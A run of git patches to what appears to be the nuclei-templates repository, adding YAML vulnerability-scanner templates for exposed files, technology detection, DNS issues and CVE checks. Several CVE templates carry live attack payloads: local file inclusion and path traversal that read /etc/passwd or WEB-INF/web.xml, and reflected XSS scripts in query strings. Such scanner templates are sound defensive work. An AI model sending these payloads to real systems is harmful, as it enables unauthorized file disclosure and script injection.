00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 14:07:47 +0530 Subject: [PATCH 0980/4083] Create thumbs-db-disclosure.yaml --- exposures/files/thumbs-db-disclosure.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposures/files/thumbs-db-disclosure.yaml diff --git a/exposures/files/thumbs-db-disclosure.yaml b/exposures/files/thumbs-db-disclosure.yaml new file mode 100644 index 0000000000..af2bca3ae2 --- /dev/null +++ b/exposures/files/thumbs-db-disclosure.yaml @@ -0,0 +1,22 @@ +id: thumbs-db-disclosure + +info: + name: Thumbs DB Disclosure + author: dhiyaneshDk + severity: info + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/Thumbs.db" + matchers-condition: and + matchers: + - type: regex + regex: + - '\\xD0\\xCF\\x11\\xE0\\xA1\\xB1\\x1A\\xE1' + part: body + - type: status + status: + - 200 From ff374372e0f8f83cc6f623db39f7e70ec1172019 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 21 Jul 2021 17:23:40 +0530 Subject: [PATCH 0981/4083] Update clockwork-dashboard-exposure.yaml --- misconfiguration/clockwork-dashboard-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/clockwork-dashboard-exposure.yaml b/misconfiguration/clockwork-dashboard-exposure.yaml index 06d22423a7..6dddfa7b69 100644 --- a/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/misconfiguration/clockwork-dashboard-exposure.yaml @@ -21,6 +21,7 @@ requests: - "\"url\"" - "\"time\"" part: body + condition: and - type: word words: - "application/json" From 2d45f5858c4ac4e87234193c2a59b203b2f51d88 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 21 Jul 2021 17:49:16 +0530 Subject: [PATCH 0982/4083] Update adminer-panel-fuzz.yaml --- fuzzing/adminer-panel-fuzz.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml index 74f93afaec..df0060a22f 100644 --- a/fuzzing/adminer-panel-fuzz.yaml +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -32,8 +32,9 @@ requests: - type: word words: - - "Login - Adminer" - + - "- Adminer" + - "partial(verifyVersion, " + condition: and - type: status status: - 200 From 8d953c45ea20ad9a14d52907bce70b08645a6bfb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 21 Jul 2021 18:14:42 +0530 Subject: [PATCH 0983/4083] Update sangfor-edr-auth-bypass.yaml --- vulnerabilities/other/sangfor-edr-auth-bypass.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml index a52554ef9c..bd15d6ff70 100644 --- a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml +++ b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml @@ -23,3 +23,7 @@ requests: - 'Set-Cookie=""' part: header negative: true + - type: word + words: + - 'Set-Cookie=' + part: header From 08541f08c4f455ec0b459f2085723665e022c719 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 21 Jul 2021 18:26:36 +0530 Subject: [PATCH 0984/4083] Update dedecms-carbuyaction-fileinclude.yaml --- vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml index 627999c0be..c03a8be40a 100644 --- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml +++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml @@ -13,6 +13,7 @@ requests: - '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../' headers: Cookie: code=cod + redirects: true matchers-condition: and matchers: From 111da229435f61ca7093935b4b1820d04cbf57af Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 21 Jul 2021 18:34:37 +0530 Subject: [PATCH 0985/4083] Update dedecms-membergroup-sqli.yaml --- vulnerabilities/other/dedecms-membergroup-sqli.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/other/dedecms-membergroup-sqli.yaml b/vulnerabilities/other/dedecms-membergroup-sqli.yaml index 33a4710063..4100d95baa 100644 --- a/vulnerabilities/other/dedecms-membergroup-sqli.yaml +++ b/vulnerabilities/other/dedecms-membergroup-sqli.yaml @@ -17,9 +17,8 @@ requests: - type: word words: - - "52c69e3a57331081823331c4e69d3f2" + - "52c69e3a57331081823331c4e69d3f2e" part: body - condition: and - type: status status: From d354d50bb9b140eec1e14b3b330bc086cd4a97e5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 21 Jul 2021 12:26:20 -0500 Subject: [PATCH 0986/4083] Update shell-history.yaml fix false positive --- misconfiguration/shell-history.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/shell-history.yaml b/misconfiguration/shell-history.yaml index e523c7c17c..fc007125d0 100644 --- a/misconfiguration/shell-history.yaml +++ b/misconfiguration/shell-history.yaml @@ -39,6 +39,7 @@ requests: - type: word words: + - "application/javascript" - "html>" - "text/html" part: all From 41daa90400548e102fbc836a24671a029edabcdb Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 21 Jul 2021 13:19:40 -0500 Subject: [PATCH 0987/4083] Create cold-fusion-cfcache-map.yaml --- exposures/files/cold-fusion-cfcache-map.yaml | 24 ++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/files/cold-fusion-cfcache-map.yaml diff --git a/exposures/files/cold-fusion-cfcache-map.yaml b/exposures/files/cold-fusion-cfcache-map.yaml new file mode 100644 index 0000000000..e175bc1b68 --- /dev/null +++ b/exposures/files/cold-fusion-cfcache-map.yaml @@ -0,0 +1,24 @@ +id: cold-fusion-cfcache-map + +info: + name: Discover Cold Fusion cfcache.map Files + reference: https://securiteam.com/windowsntfocus/5bp081f0ac/ + author: geeknik + severity: low + tags: disclosure,cold-fusion + +requests: + - method: GET + path: + - "{{BaseURL}}/cfcache.map" + + matchers-condition: and + matchers: + - type: word + words: + - "Mapping=" + - "SourceTimeStamp=" + condition: and + - type: status + status: + - 200 From ee85819e348fc0d4045c56a2122e6a8ac509030a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 21 Jul 2021 13:22:01 -0500 Subject: [PATCH 0988/4083] Create wp-app-log.yaml --- exposures/logs/wp-app-log.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposures/logs/wp-app-log.yaml diff --git a/exposures/logs/wp-app-log.yaml b/exposures/logs/wp-app-log.yaml new file mode 100644 index 0000000000..77e98f67c9 --- /dev/null +++ b/exposures/logs/wp-app-log.yaml @@ -0,0 +1,29 @@ +id: wp-app-log + +info: + name: Discover wp-app.log Files + author: geeknik + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-app.log" + + matchers-condition: and + matchers: + - type: word + words: + - "LANG" + - "Array" + condition: and + + - type: word + part: header + words: + - "text/html" + negative: true + + - type: status + status: + - 200 From 0da6b4211566b20585e7ae481627c9f0eba48eb4 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 22 Jul 2021 01:24:05 +0700 Subject: [PATCH 0989/4083] Create bedita-detect.yaml --- technologies/bedita-detect.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/bedita-detect.yaml diff --git a/technologies/bedita-detect.yaml b/technologies/bedita-detect.yaml new file mode 100644 index 0000000000..53f2a41514 --- /dev/null +++ b/technologies/bedita-detect.yaml @@ -0,0 +1,26 @@ +id: bedita-detect + +info: + name: BEdita detect + author: pikpikcu + severity: info + tags: tech,bedita + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'BEdita(.*)
    ' + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'target="besite">(.*)
    ' From 9ed96941e9cde27b28c8c0aa8ce37fa7ec7199ce Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 22 Jul 2021 01:34:10 +0700 Subject: [PATCH 0990/4083] Create dotclear-detect.yaml --- technologies/dotclear-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/dotclear-detect.yaml diff --git a/technologies/dotclear-detect.yaml b/technologies/dotclear-detect.yaml new file mode 100644 index 0000000000..98afc34b16 --- /dev/null +++ b/technologies/dotclear-detect.yaml @@ -0,0 +1,21 @@ +id: dotclear-detect + +info: + name: Dotclear Detect + author: pikpikcu + severity: info + tags: tech,dotclear + +requests: + - method: GET + path: + - "{{BaseURL}}/dc2/admin/auth.php" + + matchers-condition: and + matchers: + - type: word + words: + - "Dotclear" + - type: status + status: + - 200 From 7666d8d1b609f3ca1e2acc7e6df1206652e1f957 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Jul 2021 00:04:54 +0530 Subject: [PATCH 0991/4083] Update cold-fusion-cfcache-map.yaml --- exposures/files/cold-fusion-cfcache-map.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/cold-fusion-cfcache-map.yaml b/exposures/files/cold-fusion-cfcache-map.yaml index e175bc1b68..98be58c743 100644 --- a/exposures/files/cold-fusion-cfcache-map.yaml +++ b/exposures/files/cold-fusion-cfcache-map.yaml @@ -5,7 +5,7 @@ info: reference: https://securiteam.com/windowsntfocus/5bp081f0ac/ author: geeknik severity: low - tags: disclosure,cold-fusion + tags: disclosure,coldfusion,adobe requests: - method: GET From ed6814af5f8011d5ae39898ec243f13e52fb6efa Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 22 Jul 2021 01:40:54 +0700 Subject: [PATCH 0992/4083] Update dotclear-detect.yaml --- technologies/dotclear-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/dotclear-detect.yaml b/technologies/dotclear-detect.yaml index 98afc34b16..9defe59aed 100644 --- a/technologies/dotclear-detect.yaml +++ b/technologies/dotclear-detect.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: info tags: tech,dotclear - + requests: - method: GET path: From cff58a18e04533c2d87888c154369842597b6a0c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 22 Jul 2021 01:49:20 +0700 Subject: [PATCH 0993/4083] Create chevereto-detect.yaml --- technologies/chevereto-detect.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/chevereto-detect.yaml diff --git a/technologies/chevereto-detect.yaml b/technologies/chevereto-detect.yaml new file mode 100644 index 0000000000..070a428307 --- /dev/null +++ b/technologies/chevereto-detect.yaml @@ -0,0 +1,26 @@ +id: chevereto-detect + +info: + name: Chevereto detect + author: pikpikcu + severity: info + tags: tech,chevereto + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'content="Chevereto(.*)">' + + extractors: + - type: regex + part: body + group: 1 + regex: + - '' From a7c27a8514107d3d669c42b30e86f4b68c20bbba Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 22 Jul 2021 01:56:25 +0700 Subject: [PATCH 0994/4083] Create sceditor-detect.yaml --- technologies/sceditor-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/sceditor-detect.yaml diff --git a/technologies/sceditor-detect.yaml b/technologies/sceditor-detect.yaml new file mode 100644 index 0000000000..e867919421 --- /dev/null +++ b/technologies/sceditor-detect.yaml @@ -0,0 +1,22 @@ +id: sceditor-detect + +info: + name: SCEditor Detect + author: pikpikcu + severity: info + tags: tech,sceditor + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: word + words: + - "Ticket BBCode editor - SCEditor" + - 'title="SCEditor"' + - type: status + status: + - 200 From e5ec15989acc27dda759c91f55c24d1914faa815 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 21 Jul 2021 18:32:53 -0400 Subject: [PATCH 0995/4083] Create phpmyadmin-workflow.yaml --- workflows/phpmyadmin-workflow.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 workflows/phpmyadmin-workflow.yaml diff --git a/workflows/phpmyadmin-workflow.yaml b/workflows/phpmyadmin-workflow.yaml new file mode 100644 index 0000000000..49f8d008d5 --- /dev/null +++ b/workflows/phpmyadmin-workflow.yaml @@ -0,0 +1,12 @@ +id: phpmyadmin-workflow + +info: + name: phpmyadmin-workflow + author: philippedelteil + description: A workflow that runs all PhpMyAdmin related nuclei templates on a given target + tags: workflow + +workflows: + - template: exposed-panels/phpmyadmin-panel.yaml + subtemplates: + - tags: phpmyadmin From adf9a1c8dc093f7914a0dd667f5501f9f77fec90 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 22 Jul 2021 05:56:10 +0700 Subject: [PATCH 0996/4083] Create CVE-2016-1000154.yaml --- cves/2016/CVE-2016-1000154.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000154.yaml diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml new file mode 100644 index 0000000000..7be2a14754 --- /dev/null +++ b/cves/2016/CVE-2016-1000154.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000154 + +info: + name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From fa127ec3514d0f4536f3c890e1f1923d2545fb82 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 22 Jul 2021 05:57:54 +0700 Subject: [PATCH 0997/4083] Create CVE-2016-1000152.yaml --- cves/2016/CVE-2016-1000152.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000152.yaml diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml new file mode 100644 index 0000000000..0c8455b1b7 --- /dev/null +++ b/cves/2016/CVE-2016-1000152.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000152 + +info: + name: Easy Contact Form Builder <= 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 445f09a7fd5354a24d3e27768f95605dd46fba2b Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 22 Jul 2021 13:59:34 +0530 Subject: [PATCH 0998/4083] Template file update and references --- dns/dead-host-with-cname.yaml | 29 ----------------------------- dns/detect-dangling-cname.yaml | 34 ++++++++++++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 29 deletions(-) delete mode 100644 dns/dead-host-with-cname.yaml create mode 100644 dns/detect-dangling-cname.yaml diff --git a/dns/dead-host-with-cname.yaml b/dns/dead-host-with-cname.yaml deleted file mode 100644 index d5e8fa1392..0000000000 --- a/dns/dead-host-with-cname.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: dead-host-with-cname - -info: - name: Detect Dangling cnames - author: pdteam,nytr0gen - severity: info - tags: dns - -dns: - - name: "{{FQDN}}" - type: A - class: inet - recursion: true - retries: 5 - matchers-condition: and - matchers: - - type: word - words: - - "NXDOMAIN" - - - type: word - words: - - "IN\tCNAME" - - extractors: - - type: regex - group: 1 - regex: - - "IN\tCNAME\t(.+)" diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml new file mode 100644 index 0000000000..b9989c7ad7 --- /dev/null +++ b/dns/detect-dangling-cname.yaml @@ -0,0 +1,34 @@ +id: detect-dangling-cname + +info: + name: Detect Dangling cname + author: pdteam,nytr0gen + severity: info + tags: dns,takeover + reference: | + - https://securitytrails.com/blog/subdomain-takeover-tips + - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/ + - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f + - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover + +dns: + - name: "{{FQDN}}" + type: A + class: inet + recursion: true + retries: 5 + matchers-condition: and + matchers: + - type: word + words: + - "NXDOMAIN" + + - type: word + words: + - "IN\tCNAME" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" From f0d1eb2bfcf761d510d5d0826c72633d13580181 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 22 Jul 2021 14:03:27 +0530 Subject: [PATCH 0999/4083] Update detect-dangling-cname.yaml --- dns/detect-dangling-cname.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index b9989c7ad7..053e8816a9 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml @@ -16,7 +16,7 @@ dns: type: A class: inet recursion: true - retries: 5 + retries: 3 matchers-condition: and matchers: - type: word From 1c54875f24d8b0ca243caf595659278829c23c0f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 22 Jul 2021 15:35:12 +0700 Subject: [PATCH 1000/4083] Create CVE-2018-20985.yaml --- cves/2018/CVE-2018-20985.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2018/CVE-2018-20985.yaml diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml new file mode 100644 index 0000000000..e5442836a5 --- /dev/null +++ b/cves/2018/CVE-2018-20985.yaml @@ -0,0 +1,26 @@ +id: CVE-2018-20985 + +info: + name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion + author: daffainfo + description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. + severity: high + tags: cve,cve2018,wordpress,lfi + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php" + + body: "x_login=../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 7afafb1f4f649c67bc8c127353d89ea958d0e9f8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 22 Jul 2021 15:37:50 +0700 Subject: [PATCH 1001/4083] Added references --- cves/2018/CVE-2018-20985.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index e5442836a5..1088abcea7 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -4,6 +4,9 @@ info: name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion author: daffainfo description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. + reference: | + - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ + - https://www.cvedetails.com/cve/CVE-2018-20985/ severity: high tags: cve,cve2018,wordpress,lfi From 7f0295a4158da056b80cc20f8089970ecb87b5b5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 22 Jul 2021 14:11:50 +0530 Subject: [PATCH 1002/4083] Added DNSSEC Detection --- dns/dnssec-detection.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 dns/dnssec-detection.yaml diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml new file mode 100644 index 0000000000..7c64193c85 --- /dev/null +++ b/dns/dnssec-detection.yaml @@ -0,0 +1,22 @@ +id: dnssec-detection + +info: + name: DNSSEC Detection + description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled. + author: pdteam + severity: info + tags: dns,dnssec + reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/ + +dns: + - name: "{{FQDN}}" + type: DS + class: inet + recursion: true + retries: 3 + + extractors: + - type: regex + group: 1 + regex: + - "IN\tDS\t(.+)" From 938fdeec8f8512fb9894ecedec54ffcd02d1bb70 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 22 Jul 2021 15:23:19 +0530 Subject: [PATCH 1003/4083] Added CVE-2021-34429 and fixed related templates --- cves/2021/CVE-2021-28164.yaml | 2 +- cves/2021/CVE-2021-28169.yaml | 2 +- cves/2021/CVE-2021-34429.yaml | 35 +++++++++++++++++++++++++++++++++++ 3 files changed, 37 insertions(+), 2 deletions(-) create mode 100644 cves/2021/CVE-2021-34429.yaml diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index a62da7df33..859333bacb 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -24,7 +24,7 @@ requests: - type: word words: - - "" + - "" - "java.sun.com" part: body condition: and diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml index 09ad71064e..00d2820a84 100644 --- a/cves/2021/CVE-2021-28169.yaml +++ b/cves/2021/CVE-2021-28169.yaml @@ -27,7 +27,7 @@ requests: - type: word words: - - "" + - "" - "java.sun.com" part: body condition: and diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml new file mode 100644 index 0000000000..034033aa80 --- /dev/null +++ b/cves/2021/CVE-2021-34429.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-34429 + +info: + name: Jetty Authorization Before Parsing and Canonicalization Variation + author: Bernardo Rodrigues @bernardofsr | André Monteiro @am0nt31r0 + severity: medium + description: | + For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5. + reference: | + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm + tags: cve,cve2021,jetty + +requests: + - method: GET + path: + - '{{BaseURL}}/%u002e/WEB-INF/web.xml' + - '{{BaseURL}}/.%00/WEB-INF/web.xml' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + - "java.sun.com" + part: body + condition: and + + - type: word + part: header + words: + - "application/xml" \ No newline at end of file From 7d727830903e68b911665dccddc57dbd8f3ddbc7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 22 Jul 2021 16:32:37 +0530 Subject: [PATCH 1004/4083] WIP improvements --- cves/2021/CVE-2021-32820.yaml | 15 ++++++++++----- exposures/configs/appsec-yml-disclosure.yaml | 18 +++++++----------- 2 files changed, 17 insertions(+), 16 deletions(-) diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index fd3af8498d..b8ba0eb246 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml @@ -4,21 +4,26 @@ info: name: Express-handlebars Path Traversal author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json - tags: cve,cve2021,express,lfi + reference: | + - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json + tags: cve,cve2021,expressjs,lfi requests: - method: GET path: - "{{BaseURL}}/?layout=/etc/passwd" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - - "\\s*root:[x*]" - - "\\s*daemon:[x*]" - - "\\s*operator:[x*]:" + - "root:[x*]:0:0:" + - "daemon:[x*]:0:0:" + - "operator:[x*]:0:0:" part: body + condition: or diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appsec-yml-disclosure.yaml index 56ce5522aa..291d27d117 100644 --- a/exposures/configs/appsec-yml-disclosure.yaml +++ b/exposures/configs/appsec-yml-disclosure.yaml @@ -12,22 +12,18 @@ requests: path: - "{{BaseURL}}/appspec.yml" - "{{BaseURL}}/appspec.yaml" + matchers-condition: and matchers: - type: word words: - - "\"version\"" - - "\"os\"" - - "\"files\"" - - "\"permissions\"" - - "\"hooks\"" - - "\"BeforeInstall\"" - - "\"ApplicationStart\"" + - "version:" + - "os:" + - "files:" + - "source:" part: body - - type: word - words: - - "application/yaml" - part: header + condition: and + - type: status status: - 200 From 89edd83f1d501fc10ea77b2adcc8c76ef022d0ab Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 22 Jul 2021 20:46:53 +0900 Subject: [PATCH 1005/4083] Update favicon-detection.yaml Signed-off-by: GwanYeong Kim --- technologies/favicon-detection.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 1110dbd233..5add1359b3 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2036,3 +2036,7 @@ requests: name: "SpamSniper" dsl: - "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))" + - type: dsl + name: "KevinLAB" + dsl: + - "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))" From 1005b0b23b7d356fce5ac069ae63b66edea406e5 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 22 Jul 2021 20:47:23 +0900 Subject: [PATCH 1006/4083] Create kevinlab-device-detect.yaml Signed-off-by: GwanYeong Kim --- iot/kevinlab-device-detect.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 iot/kevinlab-device-detect.yaml diff --git a/iot/kevinlab-device-detect.yaml b/iot/kevinlab-device-detect.yaml new file mode 100644 index 0000000000..8e28c8b5ba --- /dev/null +++ b/iot/kevinlab-device-detect.yaml @@ -0,0 +1,30 @@ +id: kevinlab-device-detect + +info: + name: KevinLAB Deviceas Detection + description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. + author: gy741 + severity: info + tags: iot + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/" + - "{{BaseURL}}/dashboard/" + + matchers-condition: or + matchers: + - type: word + words: + - 'BEMS' + - '../http/index.php' + part: body + condition: and + + - type: word + words: + - 'HEMS' + - '../dashboard/proc.php' + part: body + condition: and From 4c83f2341b5f761dd9a138d735219c2037a53c77 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Jul 2021 17:53:22 +0530 Subject: [PATCH 1007/4083] Update CVE-2016-1000152.yaml --- cves/2016/CVE-2016-1000152.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index 0c8455b1b7..7c3165b3f0 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -4,19 +4,20 @@ info: name: Easy Contact Form Builder <= 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin tidio-form v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: 